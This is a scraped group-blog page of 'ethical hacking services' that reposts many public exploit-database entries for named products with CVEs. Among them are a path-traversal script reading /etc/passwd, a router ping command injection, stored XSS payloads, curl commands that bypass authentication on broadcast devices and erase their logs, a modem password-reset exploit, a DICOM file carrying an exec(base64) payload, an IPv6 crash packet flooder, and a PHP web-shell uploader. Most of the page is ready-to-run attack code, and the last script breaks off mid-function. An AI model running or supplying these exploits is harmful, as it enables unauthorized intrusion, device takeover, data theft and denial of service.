# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422
#!/usr/bin/python
import argparse
import requests
def exploit(target_url):
url = f'http://{target_url}/api/get-browser-snapshot'
params = {
'snapshot_path': '../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
args = parser.parse_args()
exploit(args.target)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863100387
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2024-07-31
#Vendor : Genexus
#Version : Genexus Protection Server 9.7.2.10
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro
#Analyze PoC :
==============
C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: protsrvservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ProtSrvService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux
import requests
from requests.auth import HTTPBasicAuth
def get_input(prompt, default_value):
user_input = input(prompt)
return user_input if user_input else default_value
base_url = input("Enter the base URL: ")
if not base_url:
print("Base URL is required.")
exit(1)
username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")
login_url = f"{base_url}/login.cgi"
login_payload = {
"username": username,
"password": password,
"login": "Login"
}
login_headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "close"
}
session = requests.Session()
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)
# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
print("Login successful!")
# The command to be executed on the device
command = "cat /etc/passwd"
ping_ip = f"4.2.2.4||{command}"
# Data to be sent in the POST request
data = {
"ping_ip": ping_ip,
"ping_timeout": "1",
"textareai": "",
"ping_start": "Ping"
}
# Headers to be sent with the request
headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Referer": f"{base_url}/admin.cgi?action=ping",
"Connection": "close"
}
# Sending the HTTP POST request to exploit the vulnerability
exploit_url = f"{base_url}/admin.cgi?action=ping"
response = session.post(exploit_url, headers=headers, data=data, verify=False)
if any("root" in value for value in response.headers.values()):
print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
print(response.headers)
else:
print("Exploit failed. The response headers did not contain the expected output.")
else:
print("Login failed. Please check the credentials and try again.")
# Print the response headers for further analysis
print(response.headers)
# Exploit Title: Stored XSS Vulnerability via File Name
# Google Dork: N/A
# Date: 08 Aug 2024
# Exploit Author: Md. Sadikul Islam
# Vendor Homepage: https://www.helpdeskz.com/
# Software Link:
https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip
# Version: v2.0.2
# Tested on: Kali Linux / Firefox 115.1.0esr (64-bit)
# CVE : N/A
Payload: "><img src=x onerror=alert(1);>
Filename can be Payload: "><img src=x onerror=alert(1);>.jpg
VIdeo PoC:
https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link
Steps to Reproduce:
1. Log in as a regular user and create a new ticket.
2. Fill out all the required fields with the necessary information.
3. Attach an image file with a malicious payload embedded in the
filename.
4. Submit the ticket.
5. Access the ticket from the administration panel to trigger the
payload execution.
Cross-Site Scripting (XSS) exploits can compromise the administration
panel, directly affecting administrators by allowing malicious scripts to
execute within their privileged environment.
Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5822
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
1.5.56 Revision 884
1.229 Revision 440
Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5820
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
1.5.56 Revision 884
1.229 Revision 440
Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5821
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.
Elber Wayber Analog/Digital Audio STL 4.00 Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5823
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.
# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset
# Date: 7/16/24
# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com>
# Vendor: HughesNet
# Version: Arcadyan httpd 1.0
# Tested on: Linux
# CVE: CVE-2021-20090
import sys
import requests
import re
import base64
import hashlib
import urllib
red = "\033[0;41m"
green = "\033[1;34;42m"
reset = "\033[0m"
def print_banner():
print(green + '''
_____________ _______________ _______________ ________ ____ _______________ _______ _______________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \
\ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \
\______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ /
\/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset)
print(" Administrator password reset for HughesNet HT2000W Satellite Modem")
print('''
Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>
<password>: The new administrator password
<ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n
This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset
the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as
improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')
return None
def get_httoken(ip_address):
# Make a GET request to system_p.htm using path traversal
r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')
if r.status_code != 200:
print(red + f"(-) Failure: Could not request system_p.htm" + reset)
exit()
# Extract the httoken hidden in the DOM and convert it from Base64
return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')
def encode_pass(password):
# Vigenere Cipher
key = "wg7005d"
enc_pass = ""
idx = 0
for c in password:
enc_pass += str(ord(c) + ord(key[idx])) + "+"
idx = (idx + 1) % len(key)
return enc_pass
def change_pass(ip_address, httoken, enc_pass):
# Create a POST request with the httoken and the encoded password
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}
payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}
payload = urllib.parse.urlencode(payload, safe=':+')
try:
r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)
except:
pass
return None
def verify_pass(ip_address, new_pass):
# Make a GET request to cgi_sys_p.js to verify password
httoken = get_httoken(ip_address)
headers = {'Referer': f'http://{ip_address}/system_p.htm'}
r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)
if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():
print(red + "(-) Failure: Could not verify the hash of the password" + reset)
exit()
def main():
if not (len(sys.argv) == 2 or len(sys.argv) == 3):
print_banner()
return
new_pass = sys.argv[1]
ip_address = "192.168.42.1"
if sys.argv == 3:
ip_address = sys.argv[2]
httoken = get_httoken(ip_address)
print(f"[+] Obtained httoken: {httoken}")
enc_pass = encode_pass(new_pass)
change_pass(ip_address, httoken, enc_pass)
print(f"[+] Password reset to: {new_pass}")
verify_pass(ip_address, new_pass)
print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())
print("[+] Password successfully changed!")
return
if __name__ == '__main__':
main()
# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)
# Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave)
# Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti
#(partywave)
# Date: 23/08/2024
# Vendor Homepage: https://invesalius.github.io/
# Software Link:
#https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: 3.1.99991 to 3.1.99998
# Tested on: Windows
# CVE: CVE-2024-42845
# External References:
#https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845,
#https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845,
#https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan
# Description:
#----------------
#
#A Remote Code Execution (RCE) vulnerability exists in the DICOM file import
#procedure in Invesalius3. This vulnerability afflicts all versions from
#3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability
#involve the use of a crafted DICOM file which, once imported inside the
#victim's client application allows an attacker to gain remote code
#execution over the victim's machine.
# Script:
#----------------
#
###
# The script below creates a specifically crafted DICOM payload for
#CVE-2024-42845. Remote Code Execution is gained once the DICOM file is
#imported inside the victim's client application.
###
import pydicom
import base64
import argparse
pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE
def encode_payload(plain_payload):
data = open(plain_payload, 'rb').read()
return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"
def prepare_dicom_payload(dicom_file_path, payload):
try:
dicom_data = pydicom.dcmread(dicom_file_path)
values = dicom_data[0x0020, 0x0032].value
mal = [str(i) for i in values]
mal.append(encode_payload(payload))
except pydicom.errors.InvalidDicomError:
print("The file is not a valid DICOM file.")
except Exception as e:
print(f"An error occurred: {e}")
return mal
def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign):
try:
dicom_dataset = pydicom.dcmread(dicom_file_path)
if sign:
dicom_dataset.Manufacturer = "Malicious DICOM file creator"
dicom_dataset.InstitutionName = "Malicious DICOM file institution"
elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)
dicom_dataset[0x00200032] = elem
print(dicom_dataset)
dicom_dataset.save_as(outfile)
except Exception as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Read a DICOM file.')
parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')
parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')
parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')
parser.add_argument('--signature', required=False, default=True)
args = parser.parse_args()
dicom_infile_path = args.dicom
dicom_outfile_path = args.outfile
print(args.signature)
tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload)
if tmp_tag:
malicious_tag = '\\'.join(tmp_tag)
modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature)
exit(0)
else:
exit(1)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
# Date: 2024-08-07
# Exploit Author: Photubias
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063
import os, subprocess, re, time, sys
## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder
if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument
sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery
iBatches = 20
iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch
try:
print('--- Loading Scapy, might take some time ...')
from scapy.config import conf
conf.ipv6_enabled = False
import scapy.all as scapy
scapy.conf.verb = 0
except:
print('Error while loading scapy, please run "pip install scapy"')
exit(1)
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
def selectInterface(): #adapter[] = npfdevice, ip, mac
def getAllInterfaces():
lstInterfaces=[]
if os.name == 'nt':
proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
for bInterface in proc.stdout.readlines():
lstInt = bInterface.split(b',')
sAdapter = lstInt[0].strip(b'"').decode()
sDevicename = lstInt[1].strip(b'"').decode()
sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
except: sIP = ''
if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add
else:
proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
for bInterface in proc.stdout.readlines():
lstInt = bInterface.strip().split(b' ')
try:
if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
except: pass
return lstInterfaces
lstInterfaces = getAllInterfaces()
if len(lstInterfaces) > 1:
i = 1
for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID
print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
i += 1
#sAnswer = input('[?] Please select the adapter [1]: ')
sAnswer='3'
else: sAnswer = None
if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1
iAnswer = int(sAnswer) - 1
sNPF = lstInterfaces[iAnswer][0]
sIP = lstInterfaces[iAnswer][1]
sMAC = lstInterfaces[iAnswer][2]
if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])
def get_packets(iID, sDstIPv6, sDstMac=None):
iFragID = 0xbedead00 + iID
oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'
oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)
if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
return [oPacket1, oPacket2, oPacket3]
def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation
sMACResp = None
oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)
if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
return sMACResp
lstInt = selectInterface() ## NPF, IPv6, MAC, Name
sMAC = doIPv6ND(sDstIP, lstInt[0])
if sMAC:
print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
sDstMAC = sMAC
elif sDstMAC != '':
print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))
else:
print('[-] Without a MAC address, this exploit will probably not work')
lstPacketsToSend = []
for i in range(iBatches):
for j in range(iCorruptions):
lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)
## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))
## Verification first: "ICMPv6ParamProblem"
lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]:
print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))
else:
input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')
print('[i] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')
########## Exploit
print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
scapy.sendp(lstPacketsToSend, iface=lstInt[0])
print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')
# Exploit Title: Stored XSS in Gitea
# Date: 27/08/2024
# Exploit Authors: Catalin Iovita & Alexandru Postolache
# Vendor Homepage: (https://github.com/go-gitea/gitea)
# Version: 1.22.0
# Tested on: Linux 5.15.0-107, Go 1.23.0
# CVE: CVE-2024-6886
## Vulnerability Description
Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
## Steps to Reproduce
1. Log in to the application.
2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.
3. In the Description field, input the following payload:
<a href=javascript:alert()>XSS test</a>
4. Save the changes.
5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
# Date: 6th October, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Version: 1.52.01
# Tested on: Ubuntu
import argparse
import requests
import random
import string
import urllib.parse
def command_shell(exploit_url):
commands = input("soplaning:~$ ")
encoded_command = urllib.parse.quote_plus(commands)
command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
if command_res.status_code == 200:
print(f"{command_res.text}")
return
print(f"Error: An erros occured while running command: {encoded_command}")
def exploit(username, password, url):
target_url = f"{url}/process/login.php"
upload_url = f"{url}/process/upload.php"
link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"
login_data = {"login":username,"password":password}
res = requests.post(target_url, data=login_data, allow_redirects=False)
cookies = res.cookies
multipart_form_data = {
"linkid": link_id,
"periodeid": 0,
"fichiers": php_filename,
"type": "upload"
}
web_shell = "<?php system($_GET['cmd']); ?>"
files = {
'fichier-0': (php_filename, web_shell, 'application/x-php')
}
upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)
if upload_res.status_code == 200 and "File" in upload_res.text:
print(f"[+] Uploaded ===> {upload_res.text}")
print("[+] Exploit completed.")
exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
print(f"Access webshell here: {exploit_url}?cmd=<command>")
if "yes" == input("Do you want an interactive shell? (yes/no) "):
try:
while True:
command_shell(exploit_url)
except Exception as e:
raise(f"Error: {e}")
else:
pass
def main():
parser = argparse.ArgumentParser(prog="SOplanning RCE", \
usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
